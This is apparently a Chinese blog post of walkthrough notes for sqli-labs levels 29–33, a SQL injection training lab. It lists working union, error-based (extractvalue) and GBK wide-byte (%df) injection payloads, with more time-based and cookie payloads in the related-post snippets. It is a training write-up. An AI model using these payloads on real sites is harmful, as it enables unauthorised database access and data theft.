sqllab第29-33通关笔记

最新推荐文章于 2024-11-09 15:56:43 发布
最新推荐文章于 2024-11-09 15:56:43 发布
阅读量279 收藏 1
点赞数 7
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136784150
版权

29关知识点:

  • 单引号闭合绕过
  • 联合注入
    • payload:id=0%27union+select+1,2,database()%271
  • 报错注入
    • id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
  • 下面就不演示了,上面给出了payload,感觉没有任何过滤信息,那个waf应该是唬人的

30关知识点:

  • 双引号闭合绕过
  • 联合注入
    • payload:id=0"union+select+1,database(),version()%20"
  • 这里不能使用错误注入,没有回显信息

31关知识点:

  • 原始语句
    • where id=("输入")
  • 报错注入
    • 双引号闭合
      • paylaod:id=1"+and+extractvalue(1,concat(0x7e,database(),0x7e))="1
    • 双引号+括号闭合
      • payload:id=1")+and+extractvalue(1,concat(0x7e,database(),0x7e))=("1
  • 联合注入
    • payload:id=0")%20union%20select%201,database(),3%20and+1=("1

32关知识点:

  • 单引号闭合+注释绕过
  • 宽字节注入+错误注入
    • 利用%df吞掉\  GBK模式采用两个字符表示一个中文字符
    • payload:id=1%df%27%20and%20extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 宽字节注入+联合注入
    • payload:id=0%df%27%20union%20select%201,database(),version()--+
  • 对单引号、双引号、\ 进行了过滤

33关知识点:

  • 和32关一模一样
  • 过滤条件使用了addslashes()函数
    • 效果就是把单引号、双引号、\、null进行转义了
    • 和32关手写注释条件效果一样
  • 具体payload就不写了,直接用32关的就好

10

I_WORM
关注
sqllab第十六关通关笔记
I_WORM的博客
03-14 827
构造payload:username=a")+or+if((mid((select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security'),1,1)='e'),sleep(2),1)#放入爆破模块中,设置不变(这里没测数据长度,我直接用的50,假设目标长度<50,那么结果中有效的payload1不会到50,如果有效payload1到了50说明长度>=50,此时我会增加长度;
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3294
sqli-labs靶场之前建议补一下基础。
sqllab第二十一关通关笔记
I_WORM的博客
03-15 330
构造payload:1') or extractvalue(1,concat(0x7e,database(),0x7e))#直接截取带有cookie的数据包,发现uname参数的值被加密了,%3d是等号,这应该是一个base64加密。base64加密:MScrb3IrMT0xIw==(可以再次进行url编码,=变为%3d;通过在线解码平台对数据进行解密发现是admin,这就对上了,确实是一个base64加密。根据得到的信息,重新构造payload:1')+or+1=1#感觉是没问题的,是不是+号的问题呢?
sqllab通关笔记(汇总)
I_WORM的博客
03-18 561
10。
sqllab第二十二关通关笔记
I_WORM的博客
03-15 247
构造payload:1" or extractvalue(1,concat(0x7e,database(),0x7e))#出现了语法错误的报错信息,说明这里使用了双引号进行读取输入。base64加密:MSIgb3IgZXhwKDcxMCkj。出现了hacker的页面,说明信息错误但是单引号没起作用。构造payload:1" or exp(710)#测试这里使用什么手段读取输入。参数值被base64加密了。base64加密:MSc=base64加密:MSI=成功获取到了数据库名;构造payload:1"
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 7138
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 11万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sqli-lab第17~22关通关笔记
m0_52361291的博客
06-12 467
本来今天是说要到第25关的但是到了第23关我太菜了实在没看出来要咋做,用sqlmap跑了一下是利用延时注入的payload,我一开始想的是跟前面一样用的是联合注入,看了一下源代码也没看出来啥原因导致用的延时所以先休息总结一下前面的,23关明天搞。在1~4关中sqlmap直接注入就行了 而在5~8关中由于是布尔型注入所以在使用sqlmap注入时要加上 --technique B参数面对其他类型的盲注对应的参数是 在第9~10关中是延时注入所以用到了 --technique T参数 11~16关都是po
sqli-labs关卡10(基于get提交的双引号闭合的时间盲注)通关思路
zyh1588的博客
11-01 458
小白回顾sqli-labs靶场第十关
upload-labs 通关笔记
box
04-12 991
Pass-01(前端绕过) 直接上传 php文件发现 只允许上传图片,是被前端 js过滤的。对于前端防护,有多种方式 可以绕过 将test.php文件重命名为test.php.jpg,使用burp抓包将图片后缀改回php文件后缀 将HTML源码保存到本地,删除JS部分 浏览器禁用JS Pass-02(MIEM校验绕过) 源码: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPL
21.急算冲关-运算通关-项目源码与素材,Scratch少儿编程,经典教学作品,儿童益智游戏
04-20
《急算冲关-运算通关》是一个专门为少儿编程学习者设计的经典教学项目,采用流行的Scratch编程语言,旨在提升儿童的计算能力和逻辑思维能力。该项目通过制作一款益智游戏,让孩子们在玩乐中学习编程知识,同时也锻炼...
sqli-lab通关笔记
SYJ_361的博客
12-15 4369
sqli-lab通关笔记前6关 Less-1–基于单引号的字符型注入 配置信息 ​ 在Lsee-1目录下的index.php中配置 echo $sql; echo "<br>"; 用于在网页显示sql语句 初始界面 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 输入ID后的界面 首先,按F12–【hackbar】 然后,Load加载网页地址到URL上 在URL上输入【 ?id=1
批量归一化 BN(Batch Normalization) (减少重复学习 - 加速损失收敛) + 代码实现 ——笔记2.15《动手学深度学习》
科研汪小陈的博客
11-08 958
批量归一化固定小批量中的均值和方差,然后学习出适合的偏移和缩放; 可以加速收敛速度(比如以前学习率是0.01,现在用了批量归一化后,可以调到0.1) 不会出现之前:学习率太大的话,上面 (靠近损失的梯度) 会炸掉; 不会出现之前:学习率太小的话,下面 (靠近数据的模型参数) 会学不动; 每一个层的输出都通过均值方差放在一起了,上下层的分布都差不多是正态分布; 但一般不改变模型精度
RK3588开发笔记:CPU、GPU、DDR和NPU模式设置与查询
flypig has a dream!
11-05 266
以下是关于RK3588开发板在和NPU模式设置与查询的开发笔记,希望可以帮助开发者深入了解该芯片的硬件资源配置和调试方法。提示:以下是本篇文章正文内容,下面案例可供参考以上是对RK3588中CPU、GPU、DDR和NPU的模式设置与查询方式的总结。合理设置这些模块的工作频率和模式,可以显著优化RK3588在不同场景中的性能和功耗。
软件测试学习笔记丨Vue常用指令-条件渲染(v-if)
ceshiren_com的博客
11-05 626
v-show只是简单控制dom元素的display属性。v-if通过操纵dom元素来进行切换显示。
Greiner 经典力学(多体系统和哈密顿力学)第十二章 学习笔记(Rotation About a Point)
最新发布
Ivan 的专栏
11-09 509
上一章是绕定轴转动,这章是绕定点转动。这一章明显上难度了。
协议栈攻击分类(CISP-PTE笔记
土豆片的博客
11-06 706
1.协议栈自身的脆弱性​ 1)缺乏数据源验证机制​ 2)缺乏完整性验证机制​ 3)缺乏机密性验证机制2.网络接口层攻击3.网络层攻击4.应用层攻击。
nvlink 训练笔记
jacke121的专栏
11-05 307
nvlink 训练笔记
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相关信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值